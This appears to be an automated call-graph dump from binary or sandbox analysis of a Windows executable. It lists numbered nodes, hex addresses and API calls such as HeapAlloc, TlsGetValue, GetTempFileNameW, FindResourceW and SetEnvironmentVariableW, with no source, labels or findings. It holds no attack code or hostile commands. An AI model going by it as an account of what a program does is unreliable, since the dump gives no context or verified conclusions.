8083->8084 8085 40a558 8083->8085 8084->7600 8084->7601 8109 40a79a 8085->8109 8087 40a560 8116 40dfc6 8087->8116 8090 40a5a3 HeapFree 8090->8084 8091 40a58f 8092 40a590 HeapFree 8091->8092 8092->8092 8093 40a5a2 8092->8093 8093->8090 8095 40deba 8094->8095 8096 40df72 RtlAllocateHeap 8095->8096 8097 40dec6 8095->8097 8099 40df87 8096->8099 8100 40a4f6 HeapAlloc 8096->8100 8153 40e0c3 LoadLibraryW 8097->8153 8099->8100 8102 40dfb0 InitializeCriticalSection 8099->8102 8100->7605 8102->8100 8103 40df07 HeapAlloc 8104 40df65 LeaveCriticalSection 8103->8104 8105 40df1d 8103->8105 8104->8100 8107 40de99 6 API calls 8105->8107 8106 40deeb 8106->8103 8106->8104 8108 40df34 8107->8108 8108->8104 8113 40a7ae 8109->8113 8110 40a7f7 memset 8111 40a810 8110->8111 8111->8087 8112 40a7b9 HeapFree 8112->8113 8113->8110 8113->8112 8129 41242a 8113->8129 8134 40ddcb 8113->8134 8117 40dfd3 EnterCriticalSection 8116->8117 8118 40e038 8116->8118 8120 40e02e LeaveCriticalSection 8117->8120 8121 40dfef 8117->8121 8144 40dd5d 8118->8144 8124 40a568 HeapFree HeapFree 8120->8124 8123 40dfc6 4 API calls 8121->8123 8127 40dff9 HeapFree 8123->8127 8124->8090 8124->8091 8125 40e044 DeleteCriticalSection 8126 40e04e HeapFree 8125->8126 8126->8124 8127->8120 8130 412525 8129->8130 8133 412442 8129->8133 8130->8113 8131 41242a HeapFree 8131->8133 8133->8130 8133->8131 8141 40e5f0 8133->8141 8135 40ddd8 EnterCriticalSection 8134->8135 8139 40dde2 8134->8139 8135->8139 8136 40de94 8136->8113 8137 40de8a LeaveCriticalSection 8137->8136 8138 40de4b 8138->8136 8138->8137 8139->8138 8140 40de35 HeapFree 8139->8140 8140->8138 8142 40e5fb HeapFree 8141->8142 8143 40e60e 8141->8143 8142->8143 8143->8133 8145 40dd75 8144->8145 8146 40dd6b EnterCriticalSection 8144->8146 8147 40dd92 8145->8147 8148 40dd7c HeapFree 8145->8148 8146->8145 8149 40dd98 HeapFree 8147->8149 8150 40ddae 8147->8150 8148->8147 8148->8148 8149->8149 8149->8150 8151 40ddc5 8150->8151 8152 40ddbb LeaveCriticalSection 8150->8152 8151->8125 8151->8126 8152->8151 8154 40e0e0 GetProcAddress 8153->8154 8155 40e10b InterlockedCompareExchange 8153->8155 8156 40e100 FreeLibrary 8154->8156 8161 40e0f0 8154->8161 8157 40e12f InterlockedExchange 8155->8157 8159 40e11b 8155->8159 8156->8155 8158 40ded5 EnterCriticalSection 8156->8158 8157->8158 8158->8106 8159->8158 8162 40e120 Sleep 8159->8162 8161->8156 8162->8159 8164 40ab46 8163->8164 8168 40ab27 8163->8168 8165 40aa6b 8164->8165 8166 40ddcb 3 API calls 8164->8166 8165->7614 8166->8164 8167 41242a HeapFree 8167->8168 8168->8165 8168->8167 8169 40ddcb 3 API calls 8168->8169 8169->8168 8171 40e277 8170->8171 8175 40e3c2 8170->8175 8171->7628 8171->7630 8172 40e3ed HeapFree 8172->8171 8173 40e3eb 8173->8172 8174 41242a HeapFree 8174->8175 8175->8172 8175->8173 8175->8174 8177 40e68a TlsGetValue 8176->8177 8178 40e66c 8176->8178 8180 402ef9 8177->8180 8181 40e69b 8177->8181 8179 40e4d0 5 API calls 8178->8179 8182 40e671 TlsGetValue 8179->8182 8188 4051a0 8180->8188 8220 40ed40 HeapAlloc HeapAlloc TlsSetValue 8181->8220 8211 412722 8182->8211 8185 40e6a0 TlsGetValue 8187 412722 13 API calls 8185->8187 8187->8180 8221 40ee20 GetLastError TlsGetValue SetLastError 8188->8221 8190 4051ab 8190->7642 8191->7644 8192->7646 8193->7648 8194->7650 8198 40d7ad 8195->8198 8222 40d8a0 8198->8222 8199 405182 TlsGetValue 8199->7654 8201 405ebd 8200->8201 8232 40e880 TlsGetValue 8201->8232 8204 40e900 3 API calls 8205 405ed1 8204->8205 8208 405edd 8205->8208 8234 40ea10 TlsGetValue 8205->8234 8207 405f0d 8207->7656 8208->8207 8208->8208 8209 405f00 CharUpperW 8208->8209 8209->7656 8210->7658 8212 412732 TlsAlloc InitializeCriticalSection 8211->8212 8213 41274e TlsGetValue 8211->8213 8212->8213 8214 412764 HeapAlloc 8213->8214 8215 4127eb HeapAlloc 8213->8215 8216 40e688 8214->8216 8217 41277e EnterCriticalSection 8214->8217 8215->8216 8216->8180 8218 412790 7 API calls 8217->8218 8219 41278e 8217->8219 8218->8215 8219->8218 8220->8185 8221->8190 8223 40d8ac 8222->8223 8226 40e900 TlsGetValue 8223->8226 8227 40e91b 8226->8227 8228 40e941 HeapReAlloc 8227->8228 8229 40e974 8227->8229 8230 402f85 8228->8230 8229->8230 8231 40e990 HeapReAlloc 8229->8231 8230->8199 8231->8230 8233 405ec5 8232->8233 8233->8204 8234->8208 8235->7667 8236->7669 8237->7671 8239 40e900 3 API calls 8238->8239 8240 4096aa GetModuleFileNameW wcscmp 8239->8240 8241 4096e5 8240->8241 8242 4096cd memmove 8240->8242 8308 40ea90 TlsGetValue 8241->8308 8242->8241 8244 401bd6 8245 405182 TlsGetValue 8244->8245 8245->7675 8246->7684 8247->7686 8248->7688 8249->7690 8250->7693 8251->7695 8253 405e1d 8252->8253 8254 40e880 TlsGetValue 8253->8254 8255 405e40 8254->8255 8256 40e900 3 API calls 8255->8256 8257 405e4c 8256->8257 8259 401cfa 8257->8259 8309 40ea10 TlsGetValue 8257->8309 8260 405182 TlsGetValue 8259->8260 8260->7701 8310 40d700 8261->8310 8264 405182 TlsGetValue 8264->7705 8265->7711 8267 40e6e2 8266->8267 8268 40e6d3 wcslen 8266->8268 8269 40e900 3 API calls 8267->8269 8268->8267 8270 40e6ed 8269->8270 8270->7713 8271->7717 8272->7719 8273->7721 8274->7723 8275->7727 8276->7733 8277->7735 8279 405f2e 8278->8279 8280 40e880 TlsGetValue 8279->8280 8281 405f4a 8280->8281 8282 40e900 3 API calls 8281->8282 8283 405f56 8282->8283 8285 405f62 8283->8285 8326 40ea10 TlsGetValue 8283->8326 8285->7737 8327 40d968 TlsGetValue 8286->8327 8291 40e520 GetLastError TlsGetValue SetLastError 8291->7745 8292->7749 8294 40d968 16 API calls 8293->8294 8295 409885 8294->8295 8296 40973a 17 API calls 8295->8296 8297 409898 8296->8297 8298 40e900 3 API calls 8297->8298 8299 4098a6 8298->8299 8337 40ea90 TlsGetValue 8299->8337 8301 401dda 8302 40e720 TlsGetValue 8301->8302 8302->7756 8338 40ede0 TlsGetValue 8303->8338 8305 40516a 8305->7762 8306->7764 8307->7766 8308->8244 8309->8259 8311 40d712 8310->8311 8312 40d75d 8311->8312 8315 40d732 8311->8315 8313 40d8a0 3 API calls 8312->8313 8314 401d07 8313->8314 8314->8264 8319 412840 8315->8319 8317 40d738 8325 412830 free 8317->8325 8320 4128b4 malloc 8319->8320 8321 41284c WideCharToMultiByte 8319->8321 8320->8317 8321->8320 8323 412880 malloc 8321->8323 8323->8320 8324 412892 WideCharToMultiByte 8323->8324 8324->8317 8325->8312 8326->8285 8328 409869 8327->8328 8329 40d97b HeapAlloc TlsSetValue 8327->8329 8333 40973a 8328->8333 8330 40d9a7 8329->8330 8331 412722 13 API calls 8330->8331 8332 40d9c8 8331->8332 8332->8328 8334 40d968 16 API calls 8333->8334 8335 40974b GetCommandLineW 8334->8335 8336 401dbc 8335->8336 8336->7742 8336->8291 8337->8301 8338->8305 8340 40e900 3 API calls 8339->8340 8341 405dcb 8340->8341 8341->7790 8342->7804 8343->7825 8345 403227 8344->8345 8345->8345 8346 40e660 21 API calls 8345->8346 8347 403239 8346->8347 8348 4051a0 3 API calls 8347->8348 8349 403242 8348->8349 9252 405060 8349->9252 8352 405060 2 API calls 8353 40325b 8352->8353 9255 402b6d 8353->9255 8356 403264 9262 405573 GetVersionExW 8356->9262 8357 403277 8360 403281 8357->8360 8361 4033e7 8357->8361 9268 40e520 GetLastError TlsGetValue SetLastError 8360->9268 9300 40e520 GetLastError TlsGetValue SetLastError 8361->9300 8364 4033ed 9301 40e520 GetLastError TlsGetValue SetLastError 8364->9301 8365 403287 9269 40e520 GetLastError TlsGetValue SetLastError 8365->9269 8368 4033f5 8370 4062c0 3 API calls 8368->8370 8369 40328f 9270 4062c0 8369->9270 8372 403401 8370->8372 8374 40e560 3 API calls 8372->8374 8377 40340b GetSystemDirectoryW PathAddBackslashW 8374->8377 8375 40e560 3 API calls 8376 4032a5 GetWindowsDirectoryW PathAddBackslashW 8375->8376 9273 40e520 GetLastError TlsGetValue SetLastError 8376->9273 8428 4033e5 8377->8428 8379 4032c6 8381 40e6c0 4 API calls 8379->8381 8383 4032ce 8381->8383 8382 40342c 8384 40e6c0 4 API calls 8382->8384 8386 40e6c0 4 API calls 8383->8386 8385 403434 8384->8385 9261 405170 TlsGetValue 8385->9261 8388 4032d9 8386->8388 8390 40e560 3 API calls 8388->8390 8389 40343b 8392 40e5f0 HeapFree 8389->8392 8391 4032e3 PathAddBackslashW 8390->8391 9274 40e520 GetLastError TlsGetValue SetLastError 8391->9274 8394 403453 8392->8394 8396 40e5f0 HeapFree 8394->8396 8395 4032f6 8397 40e6c0 4 API calls 8395->8397 8398 40345b 8396->8398 8399 4032fe 8397->8399 8400 40e5f0 HeapFree 8398->8400 8401 40e6c0 4 API calls 8399->8401 8402 403464 8400->8402 8403 403308 8401->8403 8404 40e5f0 HeapFree 8402->8404 8405 40e560 3 API calls 8403->8405 8407 40346d 8404->8407 8406 403312 8405->8406 9275 40e520 GetLastError TlsGetValue SetLastError 8406->9275 8408 40e5f0 HeapFree 8407->8408 8410 403476 8408->8410 8410->7830 8411 40331c 8412 40e6c0 4 API calls 8411->8412 8413 403324 8412->8413 8414 40e6c0 4 API calls 8413->8414 8415 40332e 8414->8415 8416 40e6c0 4 API calls 8415->8416 8417 403338 8416->8417 8418 40e560 3 API calls 8417->8418 8419 403342 8418->8419 9276 40b440 8419->9276 8421 403350 8422 403366 8421->8422 9286 40b050 8421->9286 8424 40b440 11 API calls 8422->8424 8425 40337e 8424->8425 8426 403394 8425->8426 8427 40b050 11 API calls 8425->8427 8426->8428 9298 40e520 GetLastError TlsGetValue SetLastError 8426->9298 8427->8426 9260 40e520 GetLastError TlsGetValue SetLastError 8428->9260 8430 4033b0 9299 40e520 GetLastError TlsGetValue SetLastError 8430->9299 8432 4033b8 8433 4062c0 3 API calls 8432->8433 8434 4033c4 8433->8434 8435 40e560 3 API calls 8434->8435 8436 4033ce GetSystemDirectoryW PathAddBackslashW 8435->8436 8436->8428 8437->7836 8438->7838 8439->7840 8440->7842 8441->7846 8442->7852 8443->7854 8444->7856 8445->7858 8446->7862 8448 40e660 21 API calls 8447->8448 8449 402e56 8448->8449 8450 405060 2 API calls 8449->8450 8451 402e62 FindResourceW 8450->8451 8452 402e81 8451->8452 8453 402e9d 8451->8453 9342 402664 8452->9342 9336 40a220 8453->9336 8457 402eac 9339 40ee60 8457->9339 8461 40e5f0 HeapFree 8462 402ee7 8461->8462 8463 40e520 GetLastError TlsGetValue SetLastError 8462->8463 8463->7870 8465 40e660 21 API calls 8464->8465 8466 40215c 8465->8466 8467 4051a0 3 API calls 8466->8467 8468 402165 8467->8468 8469 402366 8468->8469 8470 40217e 8468->8470 9376 40e520 GetLastError TlsGetValue SetLastError 8469->9376 9378 40e520 GetLastError TlsGetValue SetLastError 8470->9378 8473 402184 9379 40e520 GetLastError TlsGetValue SetLastError 8473->9379 8474 402370 8476 40e6c0 4 API calls 8474->8476 8478 402378 8476->8478 8477 40218c 9380 40e520 GetLastError TlsGetValue SetLastError 8477->9380 9377 405170 TlsGetValue 8478->9377 8481 402194 9381 40e520 GetLastError TlsGetValue SetLastError 8481->9381 8482 40237f 8485 40e5f0 HeapFree 8482->8485 8484 40219c 9382 40a290 8484->9382 8487 402397 8485->8487 8489 40e5f0 HeapFree 8487->8489 8488 4021b0 9391 405182 TlsGetValue 8488->9391 8491 4023a0 8489->8491 8492 40e5f0 HeapFree 8491->8492 8494 4023a8 8492->8494 8493 4021b5 9392 406060 8493->9392 8496 40e5f0 HeapFree 8494->8496 8498 4023b1 8496->8498 8498->7873 8499 40e560 3 API calls 8500 4021c7 8499->8500 9395 40e520 GetLastError TlsGetValue SetLastError 8500->9395 8502 4021cd 9396 40e520 GetLastError TlsGetValue SetLastError 8502->9396 8504 4021d5 9397 40e520 GetLastError TlsGetValue SetLastError 8504->9397 8506 4021dd 9398 40e520 GetLastError TlsGetValue SetLastError 8506->9398 8508 4021e5 8509 40a290 5 API calls 8508->8509 8510 4021fc 8509->8510 9399 405182 TlsGetValue 8510->9399 8512 402201 8513 406060 5 API calls 8512->8513 8514 402209 8513->8514 8515 40e560 3 API calls 8514->8515 8516 402213 8515->8516 9400 40e520 GetLastError TlsGetValue SetLastError 8516->9400 8518 402219 9401 40e520 GetLastError TlsGetValue SetLastError 8518->9401 8520 402221 9402 40e520 GetLastError TlsGetValue SetLastError 8520->9402 8522 402234 9403 40e520 GetLastError TlsGetValue SetLastError 8522->9403 8524 40223c 9404 4057f0 8524->9404 8526 402252 9420 40e720 TlsGetValue 8526->9420 8528 402257 9421 40e520 GetLastError TlsGetValue SetLastError 8528->9421 8530 40225d 9422 40e520 GetLastError TlsGetValue SetLastError 8530->9422 8532 402265 8533 4057f0 9 API calls 8532->8533 8534 40227b 8533->8534 9423 405182 TlsGetValue 8534->9423 8536 402280 9424 405182 TlsGetValue 8536->9424 8538 402288 9425 408f69 8538->9425 8541 40e560 3 API calls 8542 40229b 8541->8542 8543 40235c 8542->8543 8544 4022ac 8542->8544 8545 401fba 36 API calls 8543->8545 9467 40e520 GetLastError TlsGetValue SetLastError 8544->9467 8545->8469 8547 4022b2 9468 40e520 GetLastError TlsGetValue SetLastError 8547->9468 8549 4022ba 9469 40e520 GetLastError TlsGetValue SetLastError 8549->9469 8551 4022c7 9470 40e520 GetLastError TlsGetValue SetLastError 8551->9470 8553 4022cf 8554 406060 5 API calls 8553->8554 8555 4022da 8554->8555 9471 405182 TlsGetValue 8555->9471 8557 4022df 8558 40d780 8 API calls 8557->8558 8559 4022e7 8558->8559 8560 40e560 3 API calls 8559->8560 8561 4022f1 8560->8561 8562 40235a 8561->8562 9472 40e520 GetLastError TlsGetValue SetLastError 8561->9472 8562->8469 8564 402307 9473 40e520 GetLastError TlsGetValue SetLastError 8564->9473 8566 402314 9474 40e520 GetLastError TlsGetValue SetLastError 8566->9474 8568 40231c 8569 4057f0 9 API calls 8568->8569 8570 402332 8569->8570 9475 40e720 TlsGetValue 8570->9475 8572 402337 9476 405182 TlsGetValue 8572->9476 8574 402342 9477 408e27 8574->9477 8577 4051a0 3 API calls 8578 402350 8577->8578 8579 401fba 36 API calls 8578->8579 8579->8562 8581 40e660 21 API calls 8580->8581 8599 40197a 8581->8599 8582 4019fb 8583 40a220 RtlAllocateHeap 8582->8583 8584 401a05 8583->8584 9534 40e520 GetLastError TlsGetValue SetLastError 8584->9534 8586 401a0f 9535 40e520 GetLastError TlsGetValue SetLastError 8586->9535 8587 405dc0 3 API calls 8587->8599 8589 401a17 9536 40add6 8589->9536 8592 40e520 GetLastError TlsGetValue SetLastError 8592->8599 8593 40e560 3 API calls 8594 401a28 GetTempFileNameW 8593->8594 9545 40e520 GetLastError TlsGetValue SetLastError 8594->9545 8596 401a46 9546 40e520 GetLastError TlsGetValue SetLastError 8596->9546 8597 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8597->8599 8599->8582 8599->8587 8599->8592 8599->8597 8601 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8599->8601 8600 401a4e 8602 40a240 4 API calls 8600->8602 8601->8599 8603 401a59 8602->8603 8604 40e560 3 API calls 8603->8604 8605 401a65 8604->8605 9547 40ae67 8605->9547 8611 401a9b 9556 40e520 GetLastError TlsGetValue SetLastError 8611->9556 8613 401aa3 8614 40a240 4 API calls 8613->8614 8615 401aae 8614->8615 8616 40e560 3 API calls 8615->8616 8617 401aba 8616->8617 8618 40ae67 2 API calls 8617->8618 8619 401ac5 8618->8619 8620 40ad45 3 API calls 8619->8620 8621 401ad0 GetTempFileNameW PathAddBackslashW 8620->8621 9557 40e520 GetLastError TlsGetValue SetLastError 8621->9557 8623 401afb 9558 40e520 GetLastError TlsGetValue SetLastError 8623->9558 8625 401b03 8626 40a240 4 API calls 8625->8626 8627 401b0e 8626->8627 8628 40e560 3 API calls 8627->8628 8629 401b1a 8628->8629 8630 40ae67 2 API calls 8629->8630 8631 401b25 PathRenameExtensionW GetTempFileNameW 8630->8631 9559 40e520 GetLastError TlsGetValue SetLastError 8631->9559 8633 401b54 9560 40e520 GetLastError TlsGetValue SetLastError 8633->9560 8635 401b5c 8636 40a240 4 API calls 8635->8636 8637 401b67 8636->8637 8638 40e560 3 API calls 8637->8638 8639 401b73 8638->8639 9561 40a200 HeapFree 8639->9561 8641 401b7c 8642 40e5f0 HeapFree 8641->8642 8643 401b89 8642->8643 8644 40e5f0 HeapFree 8643->8644 8645 401b92 8644->8645 8646 40e5f0 HeapFree 8645->8646 8647 401b9b 8646->8647 8648 40469c 8647->8648 8649 40e660 21 API calls 8648->8649 8653 4046a9 8649->8653 8650 40472a 9568 40e520 GetLastError TlsGetValue SetLastError 8650->9568 8651 40e520 GetLastError TlsGetValue SetLastError 8651->8653 8653->8650 8653->8651 8655 405dc0 3 API calls 8653->8655 8662 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8653->8662 8667 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8653->8667 8654 404730 8656 403539 98 API calls 8654->8656 8655->8653 8657 404746 8656->8657 8658 40e560 3 API calls 8657->8658 8659 404750 8658->8659 9569 40afda 8659->9569 8662->8653 8663 40e5f0 HeapFree 8664 404764 8663->8664 8665 40e5f0 HeapFree 8664->8665 8666 40476d 8665->8666 8668 40e5f0 HeapFree 8666->8668 8667->8653 8669 404522 8668->8669 8670 40e520 GetLastError TlsGetValue SetLastError 8669->8670 8670->7880 8672 40e660 21 API calls 8671->8672 8673 403543 8672->8673 8674 4051a0 3 API calls 8673->8674 8675 40354c 8674->8675 8676 405060 2 API calls 8675->8676 8677 403558 8676->8677 8678 403563 8677->8678 8679 403587 8677->8679 9574 40e520 GetLastError TlsGetValue SetLastError 8678->9574 8681 403591 8679->8681 8682 4035b4 8679->8682 9582 40e520 GetLastError TlsGetValue SetLastError 8681->9582 8684 4035e7 8682->8684 8685 4035be 8682->8685 8683 403569 9575 40e520 GetLastError TlsGetValue SetLastError 8683->9575 8687 4035f1 8684->8687 8688 40361a 8684->8688 9583 40e520 GetLastError TlsGetValue SetLastError 8685->9583 9601 40e520 GetLastError TlsGetValue SetLastError 8687->9601 8696 403624 8688->8696 8697 40364d 8688->8697 8689 40359d 8693 40e6c0 4 API calls 8689->8693 8699 4035a5 8693->8699 8694 403571 9576 40ae75 8694->9576 8695 4035c4 9584 40e520 GetLastError TlsGetValue SetLastError 8695->9584 9603 40e520 GetLastError TlsGetValue SetLastError 8696->9603 8700 403680 8697->8700 8701 403657 8697->8701 8698 4035f7 9602 40e520 GetLastError TlsGetValue SetLastError 8698->9602 8706 40e560 3 API calls 8699->8706 8711 4036b3 8700->8711 8712 40368a 8700->8712 9605 40e520 GetLastError TlsGetValue SetLastError 8701->9605 8714 403582 8706->8714 8709 4035cc 9585 40aeba 8709->9585 8710 40362a 9604 40e520 GetLastError TlsGetValue SetLastError 8710->9604 8716 4036e6 8711->8716 8717 4036bd 8711->8717 9607 40e520 GetLastError TlsGetValue SetLastError 8712->9607 8713 4035ff 8725 40aeba 17 API calls 8713->8725 9572 40e520 GetLastError TlsGetValue SetLastError 8714->9572 8715 40365d 9606 40e520 GetLastError TlsGetValue SetLastError 8715->9606 8723 4036f0 8716->8723 8724 403719 8716->8724 9609 40e520 GetLastError TlsGetValue SetLastError 8717->9609 8718 40e560 3 API calls 8718->8714 8722 403690 9608 40e520 GetLastError TlsGetValue SetLastError 8722->9608 9611 40e520 GetLastError TlsGetValue SetLastError 8723->9611 8736 403723 8724->8736 8737 403749 8724->8737 8733 40360b 8725->8733 8729 403632 8739 40aeba 17 API calls 8729->8739 8746 40e560 3 API calls 8733->8746 8734 403665 8747 40aeba 17 API calls 8734->8747 8735 4036c3 9610 40e520 GetLastError TlsGetValue SetLastError 8735->9610 9613 40e520 GetLastError TlsGetValue SetLastError 8736->9613 8744 4037a1 8737->8744 8745 403753 8737->8745 8738 40e560 3 API calls 8798 4035e2 8738->8798 8740 40363e 8739->8740 8750 40e560 3 API calls 8740->8750 8741 4037cb 8751 40e6c0 4 API calls 8741->8751 8742 403698 8752 40aeba 17 API calls 8742->8752 8743 4036f6 9612 40e520 GetLastError TlsGetValue SetLastError 8743->9612 9643 40e520 GetLastError TlsGetValue SetLastError 8744->9643 9615 40e520 GetLastError TlsGetValue SetLastError 8745->9615 8746->8798 8756 403671 8747->8756 8750->8798 8759 4037d3 8751->8759 8760 4036a4 8752->8760 8764 40e560 3 API calls 8756->8764 8757 4036cb 8765 40aeba 17 API calls 8757->8765 8758 403729 9614 40e520 GetLastError TlsGetValue SetLastError 8758->9614 9573 405170 TlsGetValue 8759->9573 8769 40e560 3 API calls 8760->8769 8761 4036fe 8770 40aeba 17 API calls 8761->8770 8762 403759 9616 40e520 GetLastError TlsGetValue SetLastError 8762->9616 8763 4037a7 9644 40e520 GetLastError TlsGetValue SetLastError 8763->9644 8764->8798 8773 4036d7 8765->8773 8767 403731 8774 40aeba 17 API calls 8767->8774 8769->8798 8776 40370a 8770->8776 8779 40e560 3 API calls 8773->8779 8780 40373d 8774->8780 8775 4037da 8785 40e5f0 HeapFree 8775->8785 8781 40e560 3 API calls 8776->8781 8777 403761 9617 409355 8777->9617 8778 4037af 8783 40ae75 5 API calls 8778->8783 8779->8798 8784 40e560 3 API calls 8780->8784 8781->8798 8787 4037b6 8783->8787 8784->8798 8788 4037f2 8785->8788 8790 40e560 3 API calls 8787->8790 8791 40e5f0 HeapFree 8788->8791 8789 40e560 3 API calls 8792 40377c 8789->8792 8790->8714 8793 4037fa 8791->8793 8794 403795 8792->8794 8795 403789 8792->8795 8793->7883 8797 401fba 36 API calls 8794->8797 9640 4056d8 8795->9640 8797->8798 8798->8714 8799->7887 8800->7889 8802 40e660 21 API calls 8801->8802 8803 402bb0 8802->8803 8804 4051a0 3 API calls 8803->8804 8805 402bb9 8804->8805 8806 405060 2 API calls 8805->8806 8807 402bc5 8806->8807 8808 40a220 RtlAllocateHeap 8807->8808 8809 402bcf GetShortPathNameW 8808->8809 9654 40e520 GetLastError TlsGetValue SetLastError 8809->9654 8811 402beb 9655 40e520 GetLastError TlsGetValue SetLastError 8811->9655 8813 402bf3 8814 40a290 5 API calls 8813->8814 8815 402c03 8814->8815 8816 40e560 3 API calls 8815->8816 8817 402c0d 8816->8817 9656 40a200 HeapFree 8817->9656 8819 402c16 9657 40e520 GetLastError TlsGetValue SetLastError 8819->9657 8821 402c20 8822 40e6c0 4 API calls 8821->8822 8823 402c28 8822->8823 9658 405170 TlsGetValue 8823->9658 8825 402c2f 8826 40e5f0 HeapFree 8825->8826 8827 402c46 8826->8827 8828 40e5f0 HeapFree 8827->8828 8829 402c4f 8828->8829 8830 40e720 TlsGetValue 8829->8830 8830->7893 8831->7895 8833 404594 8832->8833 8834 4099ac SetEnvironmentVariableW 8832->8834 8833->7898 8834->8833 8836->7901 8838 403807 8837->8838 8838->8838 8839 40e660 21 API calls 8838->8839 8858 403819 8839->8858 8840 40389a 9659 40e520 GetLastError TlsGetValue SetLastError 8840->9659 8842 4038a0 9660 40e520 GetLastError TlsGetValue SetLastError 8842->9660 8844 4038a8 9661 40e520 GetLastError TlsGetValue SetLastError 8844->9661 8845 405dc0 3 API calls 8845->8858 8847 4038b0 9662 40e520 GetLastError TlsGetValue SetLastError 8847->9662 8848 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8848->8858 8850 4038b8 8852 40d780 8 API calls 8850->8852 8851 40e520 GetLastError TlsGetValue SetLastError 8851->8858 8853 4038ca 8852->8853 9663 405182 TlsGetValue 8853->9663 8854 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8854->8858 8856 4038cf 8857 405eb0 6 API calls 8856->8857 8859 4038d7 8857->8859 8858->8840 8858->8845 8858->8848 8858->8851 8858->8854 8860 40e560 3 API calls 8859->8860 8861 4038e1 8860->8861 9664 40e520 GetLastError TlsGetValue SetLastError 8861->9664 8863 4038e7 9665 40e520 GetLastError TlsGetValue SetLastError 8863->9665 8865 4038ef 9666 40e520 GetLastError TlsGetValue SetLastError 8865->9666 8867 4038f7 9667 40e520 GetLastError TlsGetValue SetLastError 8867->9667 8869 4038ff 8870 40d780 8 API calls 8869->8870 8871 403911 8870->8871 9668 405182 TlsGetValue 8871->9668 8873 403916 8874 405eb0 6 API calls 8873->8874 8875 40391e 8874->8875 8876 40e560 3 API calls 8875->8876 8877 403928 8876->8877 9669 40e520 GetLastError TlsGetValue SetLastError 8877->9669 8879 40392e 9670 40e520 GetLastError TlsGetValue SetLastError 8879->9670 8881 403936 9671 40e520 GetLastError TlsGetValue SetLastError 8881->9671 8883 40393e 9672 40e520 GetLastError TlsGetValue SetLastError 8883->9672 8885 403946 8886 40d780 8 API calls 8885->8886 8887 403956 8886->8887 9673 405182 TlsGetValue 8887->9673 8889 40395b 8890 405eb0 6 API calls 8889->8890 8891 403963 8890->8891 8892 40e560 3 API calls 8891->8892 8893 40396d 8892->8893 9674 40e520 GetLastError TlsGetValue SetLastError 8893->9674 8895 403973 9675 40e520 GetLastError TlsGetValue SetLastError 8895->9675 8897 40397b 9676 40e520 GetLastError TlsGetValue SetLastError 8897->9676 8899 403983 9677 40e520 GetLastError TlsGetValue SetLastError 8899->9677 8901 40398b 8902 40d780 8 API calls 8901->8902 8903 40399b 8902->8903 9678 405182 TlsGetValue 8903->9678 8905 4039a0 8906 405eb0 6 API calls 8905->8906 8907 4039a8 8906->8907 8908 40e560 3 API calls 8907->8908 8909 4039b2 8908->8909 9679 40e520 GetLastError TlsGetValue SetLastError 8909->9679 8911 4039b8 9680 40e520 GetLastError TlsGetValue SetLastError 8911->9680 8913 4039c0 9681 40e520 GetLastError TlsGetValue SetLastError 8913->9681 8915 4039c8 9682 40e520 GetLastError TlsGetValue SetLastError 8915->9682 8917 4039d0 8918 40d780 8 API calls 8917->8918 8919 4039e0 8918->8919 9683 405182 TlsGetValue 8919->9683 8921 4039e5 8922 405eb0 6 API calls 8921->8922 8923 4039ed 8922->8923 8924 40e560 3 API calls 8923->8924 8925 4039f7 8924->8925 9684 40e520 GetLastError TlsGetValue SetLastError 8925->9684 8927 4039fd 9685 403e37 8927->9685 8930 4051a0 3 API calls 8931 403a12 8930->8931 9726 40e520 GetLastError TlsGetValue SetLastError 8931->9726 8933 403a18 8934 403e37 84 API calls 8933->8934 8935 403a28 8934->8935 8936 40e560 3 API calls 8935->8936 8937 403a34 8936->8937 9727 40e520 GetLastError TlsGetValue SetLastError 8937->9727 8939 403a3a 8940 403e37 84 API calls 8939->8940 8941 403a4a 8940->8941 8942 40e560 3 API calls 8941->8942 8943 403a54 8942->8943 9728 40e520 GetLastError TlsGetValue SetLastError 8943->9728 8945 403a5a 8946 403e37 84 API calls 8945->8946 8947 403a6a 8946->8947 8948 40e560 3 API calls 8947->8948 8949 403a74 8948->8949 9729 40e520 GetLastError TlsGetValue SetLastError 8949->9729 8951 403a7a 8952 403e37 84 API calls 8951->8952 8953 403a8a 8952->8953 8954 40e560 3 API calls 8953->8954 8955 403a94 8954->8955 9730 40e520 GetLastError TlsGetValue SetLastError 8955->9730 8957 403a9a 9731 40e520 GetLastError TlsGetValue SetLastError 8957->9731 8959 403aa2 9732 40e520 GetLastError TlsGetValue SetLastError 8959->9732 8961 403aaa 8962 402ba6 43 API calls 8961->8962 8963 403ab7 8962->8963 9733 40e720 TlsGetValue 8963->9733 8965 403abc 9734 405182 TlsGetValue 8965->9734 8967 403acb 9735 406650 8967->9735 8970 40e560 3 API calls 8971 403ade 8970->8971 9738 40e520 GetLastError TlsGetValue SetLastError 8971->9738 8973 403ae4 9739 40e520 GetLastError TlsGetValue SetLastError 8973->9739 8975 403aec 9740 40e520 GetLastError TlsGetValue SetLastError 8975->9740 8977 403af4 8978 402ba6 43 API calls 8977->8978 8979 403b01 8978->8979 9741 40e720 TlsGetValue 8979->9741 8981 403b06 9742 405182 TlsGetValue 8981->9742 8983 403b15 8984 406650 13 API calls 8983->8984 8985 403b1e 8984->8985 8986 40e560 3 API calls 8985->8986 8987 403b28 8986->8987 9743 40e520 GetLastError TlsGetValue SetLastError 8987->9743 8989 403b2e 9744 40e520 GetLastError TlsGetValue SetLastError 8989->9744 8991 403b3a 8992 40e6c0 4 API calls 8991->8992 8993 403b42 8992->8993 8994 40e6c0 4 API calls 8993->8994 8995 403b4d 8994->8995 8996 40e6c0 4 API calls 8995->8996 8997 403b57 8996->8997 8998 40e6c0 4 API calls 8997->8998 8999 403b61 8998->8999 9000 40e6c0 4 API calls 8999->9000 9001 403b6b 9000->9001 9745 40e720 TlsGetValue 9001->9745 9003 403b70 9746 405182 TlsGetValue 9003->9746 9005 403b7b 9747 4023b8 9005->9747 9008 4051a0 3 API calls 9009 403b89 9008->9009 9010 40e5f0 HeapFree 9009->9010 9011 403b94 9010->9011 9012 40e5f0 HeapFree 9011->9012 9013 403b9d 9012->9013 9014 40e5f0 HeapFree 9013->9014 9015 403ba6 9014->9015 9016 40e5f0 HeapFree 9015->9016 9017 403baf 9016->9017 9018 40e5f0 HeapFree 9017->9018 9019 403bb8 9018->9019 9020 40e5f0 